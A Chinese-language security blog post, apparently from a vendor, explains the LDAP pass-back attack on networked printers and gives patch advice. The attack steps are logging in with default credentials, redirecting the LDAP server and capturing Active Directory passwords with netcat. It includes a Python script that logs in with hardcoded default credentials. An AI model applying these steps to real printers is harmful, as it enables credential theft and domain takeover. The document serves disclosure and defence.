使用打印机漏洞获取Active Directory特权

最新推荐文章于 2024-08-30 20:46:19 发布
最新推荐文章于 2024-08-30 20:46:19 发布
阅读量531 收藏 5
点赞数 8
文章标签: 安全 网络 网络安全 漏洞 打印机漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moresec/article/details/136685253
版权

由于轻量级目录访问协议 (LDAP) 漏洞,黑客可以对具有弱或默认凭据的打印机发起回传攻击。这会暴露 Active Directory 用户的登录信息(包括具有管理权限的用户),并可用于进一步控制组织的网络。

“回传攻击”的研究首次出现在foofus.net 上发表的一份文件中。

以某打印机为例子。在针对某组织的信息收集后,可以使用未授权访问漏洞或者默认登录凭据访问受影响的打印机的 Web 界面。即使用户名和密码已更改,它们也可能会被暴力破解。

图片

接下来,找到在设备上配置的 LDAP 连接,并将服务器 IP 地址或主机名更改为他们自己的 IP 地址,如下图所示。由于此打印机固件不需要在更改其服务器地址之前重新输入或验证 LDAP 凭据,因此攻击者可以很好的进行回传攻击。

图片

图片

接下来,攻击者使用诸如 netcat 之类的工具来侦听传入连接并以明文形式显示输出。使用 LDAP 服务器搜索字段,他们可以搜索任何名称并连接到相应的帐户。

图片

我们使用netcat监听获取到了用户名、密码。

图片

后续可以进一步登录域内用户或者使用密码喷洒获取域内其他机器甚至域控。

下表列出了易受上述攻击的打印机以及相应的固件补丁。软件版本较低的设备仍然容易受到攻击,应使用施乐提供的补丁。

图片

以下是验证脚本,红队化的工具危害比较大,这边也是提供思路点到即止。


def req_qax(host):

    url1 = host + "/userpost/xerox.sets"
    url2 = host + '/ldap/ldap_list.php?from=protocolConfig'

    param = {

        "_fun_function":'HTTP_Authenticate_fn',
        "NextPage":'/properties/authentication/luidLogin.php',
        "webUsername":'admin',
        'webPassword':'1111',
        'frmaltDomain': 'default',
        'CSRFToken':'641534825d9b951c38e317f8018d399182bf70ab0497220d02e380f97d62b9e0c9fcb16f1ef979341d2fee718c4e9e62df9b4e60d626a121e660e492383724ab'

    }

    url=host+'/properties/authentication/login.php?redir=/ldap/ldap_list.php?from=protocolConfig'
    res=requests.get(url=url,verify=False,headers=headers)
    cookie=str(res.cookies)[37:69]
    cookies = {'PHPSESSID': cookie}
    res = requests.post(url1, headers=headers,data=param,cookies=cookies,verify=False)
    print(res.content)
    if b'roperties/authentication/login.php' in res.content:
        print("error")
    if(b'http_errmsg'  in res.content or b'roperties/authentication/login.php'  in res.content):
        print("登录失败")
    else:
        res2 = requests.get(url=url2, verify=False, cookies=cookies, headers=headers)
        print("---")
        print(res2.content)
        if b'No Servers Configured' in res2.content or ("未配置服务器" in res2.content.decode()):
            print("[-]" + host)
        else:
            print("[+]" + host)

同样的类似梭子鱼、HP、RICOH-Network-Printer等设备一样存在此类安全问题。

图片

在上一篇我们谈到了物联网安全漏洞和硬件制造商的松懈控制。本文中介绍的漏洞就是一个很好的例子:如今,联网设备推向市场的速度超过了它们的安全性,而极少的硬件制造商重视SDL。这使得许多使用硬件设备组织的安全位置存在盲点,因为许多看似良性的设备(如打印机)为恶意行为者提供了广泛的攻击面。建议多数IOT设备在设计阶段应该使用安全的协议如:ldaps、ftps等。

随着消费级物联网设备的普及和快速增长,安全左移不单单要在普通的web应用实践,更应该瞄准赛博空间中庞大的物联网资产。

图片

IoT设备无疑是未来的攻防战场之一,安全左移至关重要。默安科技提供安全需求分析与威胁建模服务,雳鉴STAC威胁建模系统能够对项目所涉及的业务场景进行多维度威胁评估,输出安全威胁模型、安全需求建议、需求落地方案、需求验证方案等一系列解决方法,快速输出安全需求与设计报告,完成从威胁发现到需求验证的闭环流程。

参考链接

http://foofus.net/goons/percx/praeda/pass-back-attack.pdf

https://securitydocs.business.xerox.com/wp-content/uploads/2020/02/cert_Security_Mini_Bulletin_XRX20D_for_ConnectKey.pdf

杭州默安科技
关注
snmp弱口令public漏洞工具
12-08
相信大家在用x-scan的时候绝对有扫倒snmp弱口令 public的时候 ,但是很少有人关注它 ,现在我就说一下他的用途, 其实他能够泄漏很多主机信息的
数百款惠普打印机易受严重RCE漏洞影响
smellycat000的专栏
03-23 1586
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士惠普发布了关于三个严重漏洞安全公告,它们影响数百款 LaserJet Pro、Pagewide Pro、Office.Jet、Enterprise、Large Format 和 DeskJet 打印机机型。缓冲区溢出漏洞第一份安全公告和缓冲区溢出漏洞有关,它可导致在受影响机器上执行远程代码。该漏洞的编号是CVE-202...
打印机漏洞(rce)
围城
05-10 2万+
20210510 - 0. 出发 在翻阅论文的时候,突然想起来之前的时候,看到过一些打印机漏洞;然后就在谷歌上搜索了一下,“printer rce”,然后找到了这篇文章《A Sheep in Wolf’s Clothing – Finding RCE in HP’s Printer Fleet》 说实在的,这篇文章太长了,我都没完全看。 大致内容就是说,通过购买了实际的机器,然后逆向得到了固件,最后得到了相关的源码。最后的时候,发现了源码中的一些漏洞。在替换固件的一些内容之后,实现了一个RCE。不知道我是
授权访问漏洞(及其修复方法)---看这一篇就够!!
C233333235的博客
08-05 2411
Redis 默认情况下,会绑定在 0.0.0.0:6379 ,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。
HW漏洞威胁情报第二天|HW情报
weixin_43167326的博客
07-24 1729
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!帆软V11 0day sql注入至rce浪潮财务云反序列化rce通达V11.10 前台sql注入金万维异速联云联应用系统GNRemote存在远程命令执行漏洞(已复现)
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
qq_53579360的博客
11-22 1365
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
【LDAP】LDAP 授权访问漏洞修复方案
Mrerlou的博客
12-12 3877
最近生产环境中,被安全团队扫描到了 LDAP服务存在授权访问漏洞。这里记录下如何解决。
授权访问漏洞
C233333235的博客
08-04 989
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
“永恒之蓝”漏洞简单复现
weixin_71397119的博客
04-24 598
MS17-010是指微软在2017年发布的一个安全公告,其中公开了一个严重的漏洞,被称为永恒之蓝(EternalBlue)漏洞。这个漏洞影响了微软Windows操作系统中的SMB协议(Server Message Block,服务器消息块),它是一种用于文件和打印机共享的通信协议。该漏洞会扫描开放的445端口(文件共享端口),无需用户的交互,只要用户开机上网,攻击者就能进行攻击。攻击者可以利用永恒之蓝漏洞通过网络向受感染的计算机发送恶意代码,从而实施各种攻击,包括勒索软件、间谍软件以及其他类型的恶意软件。
关于内网打印机的研究-利用PRET对惠普打印机进行渗透
qq_37969404的博客
05-13 4337
文章目录前言0x01、漏洞原理0x02、漏洞利用1.预备知识2.Nmap端口扫描3使用PRET-master进行渗透测试0x03、修补建议 前言 提示:文章阅读大概需要15分钟: 现在网络打印机已经不仅仅是一台打印机,由于自己也有IP地址,更像是一台电脑。可以进行端口扫描、读写上传恶意文件、反弹shell,相当于一台服务器。物联网时代,任何暴露在公开网络上的设备都会受到攻击。攻击者可以利用漏洞来控制这台设备,或者如果不需要身份验证,他们也可以直接连接到暴露的端口。这使得被入侵的设备常常成为恶意软件、僵尸.
Spool Print Fool(CVE-2022-21999 )提权漏洞
qq_50854662的博客
01-10 950
Spool Print Fool(CVE-2022-21999 )提权漏洞
C-Lodop打印服务系统存在任意文件读取
weixin_43567873的博客
03-08 1071
C-Lodop打印服务系统存在任意文件读取
Windows域控常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 2804
本文对近几年出现的Windows域控相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
LDAP快速入门
db20092758的博客
08-28 2082
LDAP快速入门 1. LDAP简介   LDAP(轻量级目录访问协议,Lightweight Directory Access Protocol)是实现提供被称为目录服务的信息服务。目录服务是一种特殊的数据库系统,其专门针对读取,浏览和搜索操作进行了特定的优化。目录一般用来包含描述性的,基于属性的信息并支持精细复杂的过滤能力。目录一般不支持通用数据库针对大量更新操作操作需要的复杂的...
LDAP协议基础概念
PedroHuo的专栏
01-05 591
1. 从用途上阐述LDAP,它是一个存储静态相关信息的服务,适合“一次记录多次读取”。常用LDAP服务存储的信息: 公司的物理设备信息(如打印机,它的IP地址、存放位置、厂商、购买时间等)  公开的员工信息(地址、电话、电子邮件…)  合同和账号信息(客户信息、产品交付日期、投标信息、项目信息…)  凭证信息(认证凭证、许可证凭证…) 2. 从数据结构上阐述LDAP,它是一个
域内安全:委派攻击
最新发布
8888的博客
08-30 1203
从攻击角度来说:如果攻击者拿到了一台配置了非约束委派的机器权限,可以诱导管理员来访问该机器,然后可以得到管理员的TGT,从而模拟管理员访问任意服务,相当于拿下了整个域环境,或者结合打印机漏洞让域管用户强制回连以缓存 TGT,一个域内用户访问WEB服务,但是一些资源在文件服务上,这个时候就需要委派,需要web系统代表用户A去访问文件服务的资源。3、这个时候如果域管访问了机器我们的内存中就会有域管的TGT,就可以访问任意机器了,在与域控上执行访问(在域控上执行)
授权访问漏洞测试方法及修复方案
热门推荐
weixin_42728957的博客
04-28 3万+
1、漏洞描述 授权访问漏洞,是在攻击者没有获取到登录权限或授权的情况下,不需要输入密码,即可通过输入网站控制台主页面地址或者不允许查看的连接便可进行访问,同时进行操作。 2、漏洞检测 通过抓包工具(burpsuite、fiddler等),将抓取到的功能链接,在其他浏览器进行打开。 3、修复方案: 加入用户身份认证机制或token验证,对系统的功能点增加权限控制。 <1> 采用Jav...
惠普修复已存在8年的可蠕虫漏洞,影响150多款多功能打印机
smellycat000的专栏
12-01 622
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本月初,惠普发布安全更新,修复了影响150多款多功能打印机漏洞 (CVE-2021-39238)。该漏洞可用于创建能自我复制且传播到内...
共享打印机漏洞怎么修复
03-29
共享打印机漏洞的修复方法如下: 1. 更新操作系统:更新操作系统可以修复已知的漏洞,并提高系统的安全性。在更新操作系统时,需要确保安装最新的补丁和安全更新。 2. 更改默认凭据:共享打印机漏洞的一个主要原因是默认凭据的使用。更改默认凭据可以增强系统的安全性。 3. 添加访问控制列表(ACL):ACL可以控制用户对共享打印机访问权限。通过添加ACL,可以限制非授权用户的访问,从而增强安全性。 4. 启用防火墙:启用防火墙可以限制非授权用户的访问,从而增强系统的安全性。 5. 禁用文件和打印机共享:禁用文件和打印机共享可以防止共享打印机漏洞的利用,增强系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值